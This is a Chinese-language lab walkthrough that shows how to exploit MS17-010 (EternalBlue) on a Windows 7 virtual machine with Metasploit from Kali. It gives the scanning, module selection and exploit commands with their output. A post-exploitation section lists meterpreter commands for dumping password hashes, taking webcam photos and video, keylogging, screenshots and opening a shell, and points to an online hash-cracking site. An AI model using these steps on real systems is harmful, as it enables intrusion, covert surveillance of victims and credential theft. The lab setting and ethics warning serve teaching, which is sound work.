滲透測試實戰-漏洞利用MS17-010

★關於道德倫理的忠告★

以下內容摘自《Metasploit滲透測試指南》

作爲一名滲透測試者,我們可以擊敗安全防禦機制,但這是僅僅是我們工作的一部分。當你進行滲透攻擊時,請記住如下的忠告:

  • 不要進行惡意的攻擊;

  • 不要做傻事;

  • 在沒有獲得書面授權時,不要攻擊任何目標;

  • 考慮你的行爲將會帶來的後果;

  • 如果你幹了些非法的事情,天網恢恢疏而不漏,你總會被抓到牢裏的。

1、實驗說明

1.1. 漏洞原理

MS17-010(永恆之藍)是win 7 系統的漏洞,僅影響windows系統中的SMBv1服務。該漏洞是由於SMBv1內核函數中的緩衝區溢出導致的。攻擊者可以通過該漏洞控制目標系統,並執行任意代碼。通過445文件共享端口進行利用,一旦攻擊者成功利用該漏洞,就可以在目標主機上植入各種惡意軟件。可以使用Metasploit和其他滲透測試框架進行利用和測試。

該漏洞易受攻擊,且已經公開和廣泛利用,建議windows及時進行安全更新 ,避免被攻擊。

1.2. 前提條件

攻擊者與被攻擊者的必須互相ping通,才能開始攻擊。使用VMware作爲實驗環境時,確保同一網段。

1.3. 實驗環境

VMware 版本是17

kali-linux系統,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4

win7系統,IP:192.168.242.6

VMware 安裝比較簡單,從官網下載安裝包後,根據安裝引導基本點下一步即可。kali和win7系統如果沒有,在文末有獲取方式,用VMware打開到kali和win7系統目錄下,會看到文件後綴是.vmx直接打開即可,會提示虛擬機已經移動相關的提示,選擇複製的那個選項打開。網絡適配器選擇NAT模式,IP不需要手動設置。

2、實驗流程

2.1. 確定可ping通

確定目標win7系統,與kali同一個局域網的主機,kali可ping通win7系統的ip

# ping 請求2次
ping 192.168.242.6 -c 2

# ping 結果是通的,可進行後續操作
PING 192.168.242.6 (192.168.242.6) 56(84) bytes of data.
64 bytes from 192.168.242.6: icmp_seq=1 ttl=128 time=0.607 ms
64 bytes from 192.168.242.6: icmp_seq=2 ttl=128 time=0.428 ms

2.2. 掃描存活IP和端口開放

nmap掃描,nmap -T4 -A -v -Pn 192.168.242.0/24進行全面掃描,掃描網段存活IP,以及端口開放情況

nmap 命令是kali系統自帶的命令,不用再額外安裝。

掃描結果如下,發現445端口開放着

2.3. MSF終端滲透攻擊

進入msfconsole終端,search ms17-010,查找ms17-010滲透攻擊模塊,進行模糊匹配,探測主機是否存在漏洞,利用use命令選擇測試接口exploit/windows/smb/ms17_010_eternalblue,可探查主機是否存在永恆之藍漏洞,其中 show options是查看要配置的參數情況。

注意:由於kali默認登錄的kali賬戶需要切換管理員權限

# 切換管理員權限,需要輸入密碼
sudo su

# 輸入正確密碼後,切換成功
┌──(root💀kali)-[/home/kali]
└─# 

# 進入msfconsole終端
msfconsole

# 當看到 msf6 >  就表示模塊加載成功了,輸入
msf6 > search ms17-010

# 查到相關模塊,使用的是exploit/windows/smb/ms17_010_eternalblue,索引號是0
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

# 使用模塊0
msf6 > use 0

# 可用使用 show options 查看參數,和載荷,會發現參數其實只要設置一個RHOSTS目標主機ip就可以了,載荷有默認值可以不用設置
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# 設置RHOSTS目標主機ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.242.6

# 開始攻擊
run

# 攻擊成功,會看到WIN,然後出現meterpreter >

2.4. 後滲透利用

進入meterpreter之後,表示滲透成功,可以執行一些深入利用的操作,可以執行一些後滲透命令:

screenshot //桌面截圖
getuid   //查看權限
抓取密碼:hashdump   //抓取加密之後的密碼
	加密方式:MD5  在線解密網站:https://www.cmd5.com/
拍照:
webcam_list    //查看攝像頭
webcam_snap   //通過攝像頭拍照
webcam_stream   //通過攝像頭開啓視頻
鍵盤監聽:
ps   //查看windows系統運行進程
migrate -P 進程的PID
keyscan_start  //開始監聽
keyscan_dump  //獲取監聽
keyscan_stop //停止監聽
shell  //進入的就是DOS系統  受害者win7的cmd命令行
chcp 65001 //改變編碼方式,改亂碼
whoami  //查看受害者當前用戶及權限
windows系統最高權限:system(系統權限)
從命令行退回meterpreter:exit

2.4.1.命令測試截圖

#查看權限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

# 桌面截圖 截圖成功保存到kali系統的當前目錄下
meterpreter > screenshot
Screenshot saved to: /home/kali/nOPlvAsc.jpeg

# 上傳文件 到win7系統,注意目錄必須是存在的,否則會上傳失敗
upload /home/kali/1.jpeg C:\\2.jpeg

# 拍照
# 查看攝像頭 , 顯示1: Integrated Camera 表示,攝像頭可用
meterpreter > webcam_list
1: Integrated Camera 

# 通過攝像頭拍照
meterpreter > webcam_snap

# 攝像成功輸出結果示例 
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /home/kali/XgjiynAu.jpeg
meterpreter > Running Firefox as root in a regular user's session is not supported.  ($XAUTHORITY is /home/kali/.Xauthority which is owned by kali.)

# 此時需要自己再按enter鍵繼續下一步

2.4.2.拍照功能注意說明

拍照功能需要虛擬機win7系統,右下角的照相機要設置連接如圖:

如果是使用我提供的win7系統虛擬機,需要再把一個小工具(MediaCreationTool22H2-win7照相功能.exe)複製到win7雙擊執行一下,纔可實現拍照功能。

3、資料獲取

如果需要kali和win7系統虛擬機,進行滲透測試的話,請關注我的公衆號:大象只爲你,後臺回覆:虛擬機。文件有些大下載耗時會比較久。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章